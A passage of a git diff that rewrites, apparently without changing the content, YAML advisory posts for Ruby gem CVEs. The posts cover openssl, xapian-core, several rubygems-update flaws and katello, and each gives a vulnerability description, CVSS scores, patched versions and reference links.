+    - https://web.archive.org/web/20210919031115/http://www.securitytracker.com/id/1042004
+    - https://web.archive.org/web/20211025092552/http://www.securitytracker.com/id/1039363
+    - https://github.com/ruby/ruby/commit/6617c41292
+    - https://github.com/ruby/webrick/commit/4ac0f3843ab82d1c31e1cfc719409208adef7813
+    - https://hackerone.com/reports/223363
+    - https://github.com/advisories/GHSA-369m-2gv6-mw28
+  notes: 'Versions in description: field are ruby versions, not ruby gem'
+---
diff --git a/advisories/_posts/2022-05-14-CVE-2017-14033.md b/advisories/_posts/2022-05-14-CVE-2017-14033.md
index e795ea53..8998d471 100644
--- a/advisories/_posts/2022-05-14-CVE-2017-14033.md
+++ b/advisories/_posts/2022-05-14-CVE-2017-14033.md
@@ -1,39 +1,39 @@
----
-layout: advisory
-title: 'CVE-2017-14033 (openssl): Ruby OpenSSL DoS Vulnerability'
-comments: false
-categories:
-- openssl
-advisory:
-  gem: openssl
-  cve: 2017-14033
-  ghsa: v6rp-3r3v-hf4p
-  url: https://www.ruby-lang.org/en/news/2017/09/14/openssl-asn1-buffer-underrun-cve-2017-14033/
-  title: Ruby OpenSSL DoS Vulnerability
-  date: 2022-05-14
-  description: |
-    The decode method in the OpenSSL::ASN1 module in Ruby before 2.2.8, 2.3.x
-    before 2.3.5, and 2.4.x through 2.4.1 allows attackers to cause a denial of service
-    (interpreter crash) via a crafted string.
-  cvss_v2: 5.0
-  cvss_v3: 7.5
-  patched_versions:
-  - "> 2.0.0"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2017-14033
-    - https://www.ruby-lang.org/en/news/2017/09/14/openssl-asn1-buffer-underrun-cve-2017-14033/
-    - https://www.ruby-lang.org/en/news/2017/09/14/ruby-2-2-8-released/
-    - https://www.ruby-lang.org/en/news/2017/09/14/ruby-2-3-5-released/
-    - https://access.redhat.com/errata/RHSA-2018:0378
-    - https://access.redhat.com/errata/RHSA-2018:0583
-    - https://access.redhat.com/errata/RHSA-2018:0585
-    - https://lists.debian.org/debian-lts-announce/2018/07/msg00012.html
-    - https://security.gentoo.org/glsa/201710-18
-    - https://www.debian.org/security/2017/dsa-4031
-    - https://web.archive.org/web/20210509153849/http://www.securityfocus.com/bid/100868
-    - https://web.archive.org/web/20210622181826/http://www.securitytracker.com/id/1042004
-    - https://web.archive.org/web/20210724095519/http://www.securitytracker.com/id/1039363
-    - https://github.com/advisories/GHSA-v6rp-3r3v-hf4p
-  notes: 'Versions in description: field are ruby versions, not ruby gem'
----
+---
+layout: advisory
+title: 'CVE-2017-14033 (openssl): Ruby OpenSSL DoS Vulnerability'
+comments: false
+categories:
+- openssl
+advisory:
+  gem: openssl
+  cve: 2017-14033
+  ghsa: v6rp-3r3v-hf4p
+  url: https://www.ruby-lang.org/en/news/2017/09/14/openssl-asn1-buffer-underrun-cve-2017-14033/
+  title: Ruby OpenSSL DoS Vulnerability
+  date: 2022-05-14
+  description: |
+    The decode method in the OpenSSL::ASN1 module in Ruby before 2.2.8, 2.3.x
+    before 2.3.5, and 2.4.x through 2.4.1 allows attackers to cause a denial of service
+    (interpreter crash) via a crafted string.
+  cvss_v2: 5.0
+  cvss_v3: 7.5
+  patched_versions:
+  - "> 2.0.0"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-14033
+    - https://www.ruby-lang.org/en/news/2017/09/14/openssl-asn1-buffer-underrun-cve-2017-14033/
+    - https://www.ruby-lang.org/en/news/2017/09/14/ruby-2-2-8-released/
+    - https://www.ruby-lang.org/en/news/2017/09/14/ruby-2-3-5-released/
+    - https://access.redhat.com/errata/RHSA-2018:0378
+    - https://access.redhat.com/errata/RHSA-2018:0583
+    - https://access.redhat.com/errata/RHSA-2018:0585
+    - https://lists.debian.org/debian-lts-announce/2018/07/msg00012.html
+    - https://security.gentoo.org/glsa/201710-18
+    - https://www.debian.org/security/2017/dsa-4031
+    - https://web.archive.org/web/20210509153849/http://www.securityfocus.com/bid/100868
+    - https://web.archive.org/web/20210622181826/http://www.securitytracker.com/id/1042004
+    - https://web.archive.org/web/20210724095519/http://www.securitytracker.com/id/1039363
+    - https://github.com/advisories/GHSA-v6rp-3r3v-hf4p
+  notes: 'Versions in description: field are ruby versions, not ruby gem'
+---
diff --git a/advisories/_posts/2022-05-14-CVE-2018-0499.md b/advisories/_posts/2022-05-14-CVE-2018-0499.md
index 754ab873..2eb18856 100644
--- a/advisories/_posts/2022-05-14-CVE-2018-0499.md
+++ b/advisories/_posts/2022-05-14-CVE-2018-0499.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'CVE-2018-0499 (xapian-core): xapian-core Cross-site Scripting vulnerability'
-comments: false
-categories:
-- xapian-core
-advisory:
-  gem: xapian-core
-  cve: 2018-0499
-  ghsa: 7qw4-w7hf-22q3
-  url: https://lists.xapian.org/pipermail/xapian-discuss/2018-July/009652.html
-  title: xapian-core Cross-site Scripting vulnerability
-  date: 2022-05-14
-  description: |
-    A cross-site scripting vulnerability in `queryparser/termgenerator_internal.cc`
-    in Xapian xapian-core before 1.4.6 exists due to incomplete HTML escaping by `Xapian::MSet::snippet()`.
-  cvss_v3: 6.1
-  patched_versions:
-  - ">= 1.4.6"
-  related:
-    url:
-    - https://trac.xapian.org/wiki/SecurityFixes/2018-07-02
-    - https://usn.ubuntu.com/3709-1/
----
+---
+layout: advisory
+title: 'CVE-2018-0499 (xapian-core): xapian-core Cross-site Scripting vulnerability'
+comments: false
+categories:
+- xapian-core
+advisory:
+  gem: xapian-core
+  cve: 2018-0499
+  ghsa: 7qw4-w7hf-22q3
+  url: https://lists.xapian.org/pipermail/xapian-discuss/2018-July/009652.html
+  title: xapian-core Cross-site Scripting vulnerability
+  date: 2022-05-14
+  description: |
+    A cross-site scripting vulnerability in `queryparser/termgenerator_internal.cc`
+    in Xapian xapian-core before 1.4.6 exists due to incomplete HTML escaping by `Xapian::MSet::snippet()`.
+  cvss_v3: 6.1
+  patched_versions:
+  - ">= 1.4.6"
+  related:
+    url:
+    - https://trac.xapian.org/wiki/SecurityFixes/2018-07-02
+    - https://usn.ubuntu.com/3709-1/
+---
diff --git a/advisories/_posts/2022-05-14-CVE-2018-1000074.md b/advisories/_posts/2022-05-14-CVE-2018-1000074.md
index dff12f85..63768938 100644
--- a/advisories/_posts/2022-05-14-CVE-2018-1000074.md
+++ b/advisories/_posts/2022-05-14-CVE-2018-1000074.md
@@ -1,46 +1,46 @@
----
-layout: advisory
-title: 'CVE-2018-1000074 (rubygems-update): RubyGems Deserialization of Untrusted
-  Data vulnerability'
-comments: false
-categories:
-- rubygems-update
-advisory:
-  gem: rubygems-update
-  cve: 2018-1000074
-  ghsa: qj2w-mw2r-pv39
-  url: https://github.com/rubygems/rubygems/commit/254e3d0ee873c008c0b74e8b8abcbdab4caa0a6d
-  title: RubyGems Deserialization of Untrusted Data vulnerability
-  date: 2022-05-14
-  description: |
-    RubyGems version Ruby 2.2 series: 2.2.9 and earlier, Ruby 2.3 series:
-    2.3.6 and earlier, Ruby 2.4 series: 2.4.3 and earlier, Ruby 2.5 series: 2.5.0 and
-    earlier, prior to trunk revision 62422 contains a Deserialization of Untrusted Data
-    vulnerability in owner command that can result in code execution. This attack requires
-    the victim to run the `gem owner` command on a gem with a specially crafted YAML
-    file. This vulnerability is fixed in 2.7.6.
-  cvss_v3: 7.8
-  patched_versions:
-  - ">= 2.7.6"
-  related:
-    url:
-    - https://access.redhat.com/errata/RHSA-2018:3729
-    - https://access.redhat.com/errata/RHSA-2018:3730
-    - https://access.redhat.com/errata/RHSA-2018:3731
-    - https://access.redhat.com/errata/RHSA-2019:2028
-    - https://access.redhat.com/errata/RHSA-2020:0542
-    - https://access.redhat.com/errata/RHSA-2020:0591
-    - https://access.redhat.com/errata/RHSA-2020:0663
-    - https://lists.debian.org/debian-lts-announce/2018/04/msg00017.html
-    - https://lists.debian.org/debian-lts-announce/2018/08/msg00028.html
-    - https://lists.debian.org/debian-lts-announce/2019/05/msg00028.html
-    - https://usn.ubuntu.com/3621-1/
-    - https://usn.ubuntu.com/3621-2/
-    - https://usn.ubuntu.com/3685-1/
-    - https://www.debian.org/security/2018/dsa-4219
-    - https://www.debian.org/security/2018/dsa-4259
-    - http://blog.rubygems.org/2018/02/15/2.7.6-released.html
-    - http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00036.html
-    - https://github.com/jruby/jruby/commit/0b06b48ab4432237ce5fc1bef47f2c6bcf7843f7
-    - https://github.com/rubygems/rubygems/commit/5971b486d4dbb2bad5d3445b3801c456eb0ce183
----
+---
+layout: advisory
+title: 'CVE-2018-1000074 (rubygems-update): RubyGems Deserialization of Untrusted
+  Data vulnerability'
+comments: false
+categories:
+- rubygems-update
+advisory:
+  gem: rubygems-update
+  cve: 2018-1000074
+  ghsa: qj2w-mw2r-pv39
+  url: https://github.com/rubygems/rubygems/commit/254e3d0ee873c008c0b74e8b8abcbdab4caa0a6d
+  title: RubyGems Deserialization of Untrusted Data vulnerability
+  date: 2022-05-14
+  description: |
+    RubyGems version Ruby 2.2 series: 2.2.9 and earlier, Ruby 2.3 series:
+    2.3.6 and earlier, Ruby 2.4 series: 2.4.3 and earlier, Ruby 2.5 series: 2.5.0 and
+    earlier, prior to trunk revision 62422 contains a Deserialization of Untrusted Data
+    vulnerability in owner command that can result in code execution. This attack requires
+    the victim to run the `gem owner` command on a gem with a specially crafted YAML
+    file. This vulnerability is fixed in 2.7.6.
+  cvss_v3: 7.8
+  patched_versions:
+  - ">= 2.7.6"
+  related:
+    url:
+    - https://access.redhat.com/errata/RHSA-2018:3729
+    - https://access.redhat.com/errata/RHSA-2018:3730
+    - https://access.redhat.com/errata/RHSA-2018:3731
+    - https://access.redhat.com/errata/RHSA-2019:2028
+    - https://access.redhat.com/errata/RHSA-2020:0542
+    - https://access.redhat.com/errata/RHSA-2020:0591
+    - https://access.redhat.com/errata/RHSA-2020:0663
+    - https://lists.debian.org/debian-lts-announce/2018/04/msg00017.html
+    - https://lists.debian.org/debian-lts-announce/2018/08/msg00028.html
+    - https://lists.debian.org/debian-lts-announce/2019/05/msg00028.html
+    - https://usn.ubuntu.com/3621-1/
+    - https://usn.ubuntu.com/3621-2/
+    - https://usn.ubuntu.com/3685-1/
+    - https://www.debian.org/security/2018/dsa-4219
+    - https://www.debian.org/security/2018/dsa-4259
+    - http://blog.rubygems.org/2018/02/15/2.7.6-released.html
+    - http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00036.html
+    - https://github.com/jruby/jruby/commit/0b06b48ab4432237ce5fc1bef47f2c6bcf7843f7
+    - https://github.com/rubygems/rubygems/commit/5971b486d4dbb2bad5d3445b3801c456eb0ce183
+---
diff --git a/advisories/_posts/2022-05-14-CVE-2018-1000076.md b/advisories/_posts/2022-05-14-CVE-2018-1000076.md
index bf311270..6d1b16a3 100644
--- a/advisories/_posts/2022-05-14-CVE-2018-1000076.md
+++ b/advisories/_posts/2022-05-14-CVE-2018-1000076.md
@@ -1,47 +1,47 @@
----
-layout: advisory
-title: 'CVE-2018-1000076 (rubygems-update): RubyGems Improper Verification of Cryptographic
-  Signature vulnerability'
-comments: false
-categories:
-- rubygems-update
-advisory:
-  gem: rubygems-update
-  cve: 2018-1000076
-  ghsa: mc6j-h948-v2p6
-  url: https://github.com/rubygems/rubygems/commit/f5042b879259b1f1ce95a0c5082622c646376693
-  title: RubyGems Improper Verification of Cryptographic Signature vulnerability
-  date: 2022-05-14
-  description: |
-    RubyGems version Ruby 2.2 series: 2.2.9 and earlier, Ruby 2.3 series:
-    2.3.6 and earlier, Ruby 2.4 series: 2.4.3 and earlier, and Ruby 2.5 series: 2.5.0
-    and earlier, prior to trunk revision 62422 contain an Improper Verification of Cryptographic
-    Signature vulnerability in package.rb. This can result in a mis-signed gem being
-    installed, as the tarball would contain multiple gem signatures. This vulnerability
-    has been fixed in 2.7.6.
-  cvss_v3: 9.8
-  unaffected_versions:
-  - "< 2.2.0"
-  patched_versions:
-  - ">= 2.7.6"
-  related:
-    url:
-    - https://access.redhat.com/errata/RHSA-2018:3729
-    - https://access.redhat.com/errata/RHSA-2018:3730
-    - https://access.redhat.com/errata/RHSA-2018:3731
-    - https://access.redhat.com/errata/RHSA-2019:2028
-    - https://access.redhat.com/errata/RHSA-2020:0542
-    - https://access.redhat.com/errata/RHSA-2020:0591
-    - https://access.redhat.com/errata/RHSA-2020:0663
-    - https://lists.debian.org/debian-lts-announce/2018/04/msg00000.html
-    - https://lists.debian.org/debian-lts-announce/2018/04/msg00001.html
-    - https://lists.debian.org/debian-lts-announce/2018/04/msg00023.html
-    - https://lists.debian.org/debian-lts-announce/2018/07/msg00012.html
-    - https://lists.debian.org/debian-lts-announce/2019/05/msg00028.html
-    - https://usn.ubuntu.com/3621-1/
-    - https://www.debian.org/security/2018/dsa-4219
-    - https://www.debian.org/security/2018/dsa-4259
-    - http://blog.rubygems.org/2018/02/15/2.7.6-released.html
-    - http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00036.html
-    - https://github.com/jruby/jruby/commit/0b06b48ab4432237ce5fc1bef47f2c6bcf7843f7
----
+---
+layout: advisory
+title: 'CVE-2018-1000076 (rubygems-update): RubyGems Improper Verification of Cryptographic
+  Signature vulnerability'
+comments: false
+categories:
+- rubygems-update
+advisory:
+  gem: rubygems-update
+  cve: 2018-1000076
+  ghsa: mc6j-h948-v2p6
+  url: https://github.com/rubygems/rubygems/commit/f5042b879259b1f1ce95a0c5082622c646376693
+  title: RubyGems Improper Verification of Cryptographic Signature vulnerability
+  date: 2022-05-14
+  description: |
+    RubyGems version Ruby 2.2 series: 2.2.9 and earlier, Ruby 2.3 series:
+    2.3.6 and earlier, Ruby 2.4 series: 2.4.3 and earlier, and Ruby 2.5 series: 2.5.0
+    and earlier, prior to trunk revision 62422 contain an Improper Verification of Cryptographic
+    Signature vulnerability in package.rb. This can result in a mis-signed gem being
+    installed, as the tarball would contain multiple gem signatures. This vulnerability
+    has been fixed in 2.7.6.
+  cvss_v3: 9.8
+  unaffected_versions:
+  - "< 2.2.0"
+  patched_versions:
+  - ">= 2.7.6"
+  related:
+    url:
+    - https://access.redhat.com/errata/RHSA-2018:3729
+    - https://access.redhat.com/errata/RHSA-2018:3730
+    - https://access.redhat.com/errata/RHSA-2018:3731
+    - https://access.redhat.com/errata/RHSA-2019:2028
+    - https://access.redhat.com/errata/RHSA-2020:0542
+    - https://access.redhat.com/errata/RHSA-2020:0591
+    - https://access.redhat.com/errata/RHSA-2020:0663
+    - https://lists.debian.org/debian-lts-announce/2018/04/msg00000.html
+    - https://lists.debian.org/debian-lts-announce/2018/04/msg00001.html
+    - https://lists.debian.org/debian-lts-announce/2018/04/msg00023.html
+    - https://lists.debian.org/debian-lts-announce/2018/07/msg00012.html
+    - https://lists.debian.org/debian-lts-announce/2019/05/msg00028.html
+    - https://usn.ubuntu.com/3621-1/
+    - https://www.debian.org/security/2018/dsa-4219
+    - https://www.debian.org/security/2018/dsa-4259
+    - http://blog.rubygems.org/2018/02/15/2.7.6-released.html
+    - http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00036.html
+    - https://github.com/jruby/jruby/commit/0b06b48ab4432237ce5fc1bef47f2c6bcf7843f7
+---
diff --git a/advisories/_posts/2022-05-14-CVE-2018-1000077.md b/advisories/_posts/2022-05-14-CVE-2018-1000077.md
index 788635fe..a5fd3e9c 100644
--- a/advisories/_posts/2022-05-14-CVE-2018-1000077.md
+++ b/advisories/_posts/2022-05-14-CVE-2018-1000077.md
@@ -1,44 +1,44 @@
----
-layout: advisory
-title: 'CVE-2018-1000077 (rubygems-update): RubyGems Improper Input Validation vulnerability'
-comments: false
-categories:
-- rubygems-update
-advisory:
-  gem: rubygems-update
-  cve: 2018-1000077
-  ghsa: gv86-43rv-79m2
-  url: https://github.com/rubygems/rubygems/commit/feadefc2d351dcb95d6492f5ad17ebca546eb964
-  title: RubyGems Improper Input Validation vulnerability
-  date: 2022-05-14
-  description: |
-    RubyGems version Ruby 2.2 series: 2.2.9 and earlier, Ruby 2.3 series:
-    2.3.6 and earlier, Ruby 2.4 series: 2.4.3 and earlier, Ruby 2.5 series: 2.5.0 and
-    earlier, prior to trunk revision 62422 contains a Improper Input Validation vulnerability
-    in ruby gems specification homepage attribute that can result in a malicious gem
-    setting an invalid homepage URL. This vulnerability is fixed in 2.7.6.
-  cvss_v3: 5.3
-  patched_versions:
-  - ">= 2.7.6"
-  related:
-    url:
-    - https://access.redhat.com/errata/RHSA-2018:3729
-    - https://access.redhat.com/errata/RHSA-2018:3730
-    - https://access.redhat.com/errata/RHSA-2018:3731
-    - https://access.redhat.com/errata/RHSA-2019:2028
-    - https://access.redhat.com/errata/RHSA-2020:0542
-    - https://access.redhat.com/errata/RHSA-2020:0591
-    - https://access.redhat.com/errata/RHSA-2020:0663
-    - https://lists.debian.org/debian-lts-announce/2018/04/msg00000.html
-    - https://lists.debian.org/debian-lts-announce/2018/04/msg00001.html
-    - https://lists.debian.org/debian-lts-announce/2018/04/msg00023.html
-    - https://lists.debian.org/debian-lts-announce/2018/07/msg00012.html
-    - https://lists.debian.org/debian-lts-announce/2019/05/msg00028.html
-    - https://usn.ubuntu.com/3621-1/
-    - https://www.debian.org/security/2018/dsa-4219
-    - https://www.debian.org/security/2018/dsa-4259
-    - http://blog.rubygems.org/2018/02/15/2.7.6-released.html
-    - http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00036.html
-    - https://github.com/jruby/jruby/commit/0b06b48ab4432237ce5fc1bef47f2c6bcf7843f7
-    - https://github.com/rubygems/rubygems/commit/5971b486d4dbb2bad5d3445b3801c456eb0ce183
----
+---
+layout: advisory
+title: 'CVE-2018-1000077 (rubygems-update): RubyGems Improper Input Validation vulnerability'
+comments: false
+categories:
+- rubygems-update
+advisory:
+  gem: rubygems-update
+  cve: 2018-1000077
+  ghsa: gv86-43rv-79m2
+  url: https://github.com/rubygems/rubygems/commit/feadefc2d351dcb95d6492f5ad17ebca546eb964
+  title: RubyGems Improper Input Validation vulnerability
+  date: 2022-05-14
+  description: |
+    RubyGems version Ruby 2.2 series: 2.2.9 and earlier, Ruby 2.3 series:
+    2.3.6 and earlier, Ruby 2.4 series: 2.4.3 and earlier, Ruby 2.5 series: 2.5.0 and
+    earlier, prior to trunk revision 62422 contains a Improper Input Validation vulnerability
+    in ruby gems specification homepage attribute that can result in a malicious gem
+    setting an invalid homepage URL. This vulnerability is fixed in 2.7.6.
+  cvss_v3: 5.3
+  patched_versions:
+  - ">= 2.7.6"
+  related:
+    url:
+    - https://access.redhat.com/errata/RHSA-2018:3729
+    - https://access.redhat.com/errata/RHSA-2018:3730
+    - https://access.redhat.com/errata/RHSA-2018:3731
+    - https://access.redhat.com/errata/RHSA-2019:2028
+    - https://access.redhat.com/errata/RHSA-2020:0542
+    - https://access.redhat.com/errata/RHSA-2020:0591
+    - https://access.redhat.com/errata/RHSA-2020:0663
+    - https://lists.debian.org/debian-lts-announce/2018/04/msg00000.html
+    - https://lists.debian.org/debian-lts-announce/2018/04/msg00001.html
+    - https://lists.debian.org/debian-lts-announce/2018/04/msg00023.html
+    - https://lists.debian.org/debian-lts-announce/2018/07/msg00012.html
+    - https://lists.debian.org/debian-lts-announce/2019/05/msg00028.html
+    - https://usn.ubuntu.com/3621-1/
+    - https://www.debian.org/security/2018/dsa-4219
+    - https://www.debian.org/security/2018/dsa-4259
+    - http://blog.rubygems.org/2018/02/15/2.7.6-released.html
+    - http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00036.html
+    - https://github.com/jruby/jruby/commit/0b06b48ab4432237ce5fc1bef47f2c6bcf7843f7
+    - https://github.com/rubygems/rubygems/commit/5971b486d4dbb2bad5d3445b3801c456eb0ce183
+---
diff --git a/advisories/_posts/2022-05-14-CVE-2018-1000078.md b/advisories/_posts/2022-05-14-CVE-2018-1000078.md
index d6c47800..776c5a2b 100644
--- a/advisories/_posts/2022-05-14-CVE-2018-1000078.md
+++ b/advisories/_posts/2022-05-14-CVE-2018-1000078.md
@@ -1,45 +1,45 @@
----
-layout: advisory
-title: 'CVE-2018-1000078 (rubygems-update): RubyGems Cross-site Scripting vulnerability'
-comments: false
-categories:
-- rubygems-update
-advisory:
-  gem: rubygems-update
-  cve: 2018-1000078
-  ghsa: 87qx-g5wg-mwmj
-  url: https://github.com/rubygems/rubygems/commit/66a28b9275551384fdab45f3591a82d6b59952cb
-  title: RubyGems Cross-site Scripting vulnerability
-  date: 2022-05-14
-  description: |
-    RubyGems version Ruby 2.2 series: 2.2.9 and earlier, Ruby 2.3 series:
-    2.3.6 and earlier, Ruby 2.4 series: 2.4.3 and earlier, Ruby 2.5 series: 2.5.0 and
-    earlier, prior to trunk revision 62422 contains a Cross Site Scripting (XSS) vulnerability
-    in gem server display of homepage attribute that can result in XSS. This attack
-    requires the victim to browse to a malicious gem on a vulnerable gem server. This
-    vulnerability is fixed in 2.7.6.
-  cvss_v3: 6.1
-  patched_versions:
-  - ">= 2.7.6"
-  related:
-    url:
-    - https://access.redhat.com/errata/RHSA-2018:3729
-    - https://access.redhat.com/errata/RHSA-2018:3730
-    - https://access.redhat.com/errata/RHSA-2018:3731
-    - https://access.redhat.com/errata/RHSA-2019:2028
-    - https://access.redhat.com/errata/RHSA-2020:0542
-    - https://access.redhat.com/errata/RHSA-2020:0591
-    - https://access.redhat.com/errata/RHSA-2020:0663
-    - https://lists.debian.org/debian-lts-announce/2018/04/msg00000.html
-    - https://lists.debian.org/debian-lts-announce/2018/04/msg00001.html
-    - https://lists.debian.org/debian-lts-announce/2018/04/msg00023.html
-    - https://lists.debian.org/debian-lts-announce/2018/07/msg00012.html
-    - https://lists.debian.org/debian-lts-announce/2019/05/msg00028.html
-    - https://usn.ubuntu.com/3621-1/
-    - https://www.debian.org/security/2018/dsa-4219
-    - https://www.debian.org/security/2018/dsa-4259
-    - http://blog.rubygems.org/2018/02/15/2.7.6-released.html
-    - http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00036.html
-    - https://github.com/jruby/jruby/commit/0b06b48ab4432237ce5fc1bef47f2c6bcf7843f7
-    - https://github.com/rubygems/rubygems/commit/5971b486d4dbb2bad5d3445b3801c456eb0ce183
----
+---
+layout: advisory
+title: 'CVE-2018-1000078 (rubygems-update): RubyGems Cross-site Scripting vulnerability'
+comments: false
+categories:
+- rubygems-update
+advisory:
+  gem: rubygems-update
+  cve: 2018-1000078
+  ghsa: 87qx-g5wg-mwmj
+  url: https://github.com/rubygems/rubygems/commit/66a28b9275551384fdab45f3591a82d6b59952cb
+  title: RubyGems Cross-site Scripting vulnerability
+  date: 2022-05-14
+  description: |
+    RubyGems version Ruby 2.2 series: 2.2.9 and earlier, Ruby 2.3 series:
+    2.3.6 and earlier, Ruby 2.4 series: 2.4.3 and earlier, Ruby 2.5 series: 2.5.0 and
+    earlier, prior to trunk revision 62422 contains a Cross Site Scripting (XSS) vulnerability
+    in gem server display of homepage attribute that can result in XSS. This attack
+    requires the victim to browse to a malicious gem on a vulnerable gem server. This
+    vulnerability is fixed in 2.7.6.
+  cvss_v3: 6.1
+  patched_versions:
+  - ">= 2.7.6"
+  related:
+    url:
+    - https://access.redhat.com/errata/RHSA-2018:3729
+    - https://access.redhat.com/errata/RHSA-2018:3730
+    - https://access.redhat.com/errata/RHSA-2018:3731
+    - https://access.redhat.com/errata/RHSA-2019:2028
+    - https://access.redhat.com/errata/RHSA-2020:0542
+    - https://access.redhat.com/errata/RHSA-2020:0591
+    - https://access.redhat.com/errata/RHSA-2020:0663
+    - https://lists.debian.org/debian-lts-announce/2018/04/msg00000.html
+    - https://lists.debian.org/debian-lts-announce/2018/04/msg00001.html
+    - https://lists.debian.org/debian-lts-announce/2018/04/msg00023.html
+    - https://lists.debian.org/debian-lts-announce/2018/07/msg00012.html
+    - https://lists.debian.org/debian-lts-announce/2019/05/msg00028.html
+    - https://usn.ubuntu.com/3621-1/
+    - https://www.debian.org/security/2018/dsa-4219
+    - https://www.debian.org/security/2018/dsa-4259
+    - http://blog.rubygems.org/2018/02/15/2.7.6-released.html
+    - http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00036.html
+    - https://github.com/jruby/jruby/commit/0b06b48ab4432237ce5fc1bef47f2c6bcf7843f7
+    - https://github.com/rubygems/rubygems/commit/5971b486d4dbb2bad5d3445b3801c456eb0ce183
+---
diff --git a/advisories/_posts/2022-05-14-CVE-2018-1000079.md b/advisories/_posts/2022-05-14-CVE-2018-1000079.md
index 281adb93..06f85500 100644
--- a/advisories/_posts/2022-05-14-CVE-2018-1000079.md
+++ b/advisories/_posts/2022-05-14-CVE-2018-1000079.md
@@ -1,44 +1,44 @@
----
-layout: advisory
-title: 'CVE-2018-1000079 (rubygems-update): RubyGems Path Traversal vulnerability'
-comments: false
-categories:
-- rubygems-update
-advisory:
-  gem: rubygems-update
-  cve: 2018-1000079
-  ghsa: 8qxg-mff5-j3wc
-  url: https://github.com/rubygems/rubygems/commit/666ef793cad42eed96f7aee1cdf77865db921099
-  title: RubyGems Path Traversal vulnerability
-  date: 2022-05-14
-  description: |
-    RubyGems version Ruby 2.2 series: 2.2.9 and earlier, Ruby 2.3 series:
-    2.3.6 and earlier, Ruby 2.4 series: 2.4.3 and earlier, Ruby 2.5 series: 2.5.0 and
-    earlier, prior to trunk revision 62422 contains a Directory Traversal vulnerability
-    in gem installation that can result in the gem writing to arbitrary filesystem locations
-    during installation. This attack appears to be exploitable via installation of a
-    malicious gem. This vulnerability is fixed in 2.7.6.
-  cvss_v3: 5.5
-  patched_versions:
-  - ">= 2.7.6"
-  related:
-    url:
-    - https://github.com/rubygems/rubygems/commit/f83f911e19e27cbac1ccce7471d96642241dd759
-    - https://access.redhat.com/errata/RHSA-2018:3729
-    - https://access.redhat.com/errata/RHSA-2018:3730
-    - https://access.redhat.com/errata/RHSA-2018:3731
-    - https://access.redhat.com/errata/RHSA-2019:2028
-    - https://access.redhat.com/errata/RHSA-2020:0542
-    - https://access.redhat.com/errata/RHSA-2020:0591
-    - https://access.redhat.com/errata/RHSA-2020:0663
-    - https://lists.debian.org/debian-lts-announce/2018/07/msg00012.html
-    - https://usn.ubuntu.com/3621-1/
-    - https://www.debian.org/security/2018/dsa-4219
-    - https://www.debian.org/security/2018/dsa-4259
-    - http://blog.rubygems.org/2018/02/15/2.7.6-released.html
-    - http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00036.html
-    - https://github.com/jruby/jruby/commit/0b06b48ab4432237ce5fc1bef47f2c6bcf7843f7
-    - https://github.com/rubygems/rubygems/commit/5971b486d4dbb2bad5d3445b3801c456eb0ce183
-    - https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=895778
-    - https://security-tracker.debian.org/tracker/CVE-2018-1000079
----
+---
+layout: advisory
+title: 'CVE-2018-1000079 (rubygems-update): RubyGems Path Traversal vulnerability'
+comments: false
+categories:
+- rubygems-update
+advisory:
+  gem: rubygems-update
+  cve: 2018-1000079
+  ghsa: 8qxg-mff5-j3wc
+  url: https://github.com/rubygems/rubygems/commit/666ef793cad42eed96f7aee1cdf77865db921099
+  title: RubyGems Path Traversal vulnerability
+  date: 2022-05-14
+  description: |
+    RubyGems version Ruby 2.2 series: 2.2.9 and earlier, Ruby 2.3 series:
+    2.3.6 and earlier, Ruby 2.4 series: 2.4.3 and earlier, Ruby 2.5 series: 2.5.0 and
+    earlier, prior to trunk revision 62422 contains a Directory Traversal vulnerability
+    in gem installation that can result in the gem writing to arbitrary filesystem locations
+    during installation. This attack appears to be exploitable via installation of a
+    malicious gem. This vulnerability is fixed in 2.7.6.
+  cvss_v3: 5.5
+  patched_versions:
+  - ">= 2.7.6"
+  related:
+    url:
+    - https://github.com/rubygems/rubygems/commit/f83f911e19e27cbac1ccce7471d96642241dd759
+    - https://access.redhat.com/errata/RHSA-2018:3729
+    - https://access.redhat.com/errata/RHSA-2018:3730
+    - https://access.redhat.com/errata/RHSA-2018:3731
+    - https://access.redhat.com/errata/RHSA-2019:2028
+    - https://access.redhat.com/errata/RHSA-2020:0542
+    - https://access.redhat.com/errata/RHSA-2020:0591
+    - https://access.redhat.com/errata/RHSA-2020:0663
+    - https://lists.debian.org/debian-lts-announce/2018/07/msg00012.html
+    - https://usn.ubuntu.com/3621-1/
+    - https://www.debian.org/security/2018/dsa-4219
+    - https://www.debian.org/security/2018/dsa-4259
+    - http://blog.rubygems.org/2018/02/15/2.7.6-released.html
+    - http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00036.html
+    - https://github.com/jruby/jruby/commit/0b06b48ab4432237ce5fc1bef47f2c6bcf7843f7
+    - https://github.com/rubygems/rubygems/commit/5971b486d4dbb2bad5d3445b3801c456eb0ce183
+    - https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=895778
+    - https://security-tracker.debian.org/tracker/CVE-2018-1000079
+---
diff --git a/advisories/_posts/2022-05-14-CVE-2018-16887.md b/advisories/_posts/2022-05-14-CVE-2018-16887.md
index b5ebe507..73e8e57c 100644
--- a/advisories/_posts/2022-05-14-CVE-2018-16887.md
+++ b/advisories/_posts/2022-05-14-CVE-2018-16887.md
@@ -1,27 +1,27 @@
----
-layout: advisory
-title: 'CVE-2018-16887 (katello): katello Cross-site Scripting vulnerability'
-comments: false
-categories:
-- katello
-advisory:
-  gem: katello
-  cve: 2018-16887
-  ghsa: mhhc-r88h-2qrm
-  url: https://access.redhat.com/errata/RHSA-2019:1222
-  title: katello Cross-site Scripting vulnerability
-  date: 2022-05-14
-  description: |
-    A cross-site scripting (XSS) flaw was found in the katello component
-    of Satellite. An attacker with privilege to create/edit organizations and locations
-    is able to execute a XSS attacks against other users through the Subscriptions or
-    the Red Hat Repositories wizards. This can possibly lead to malicious code execution
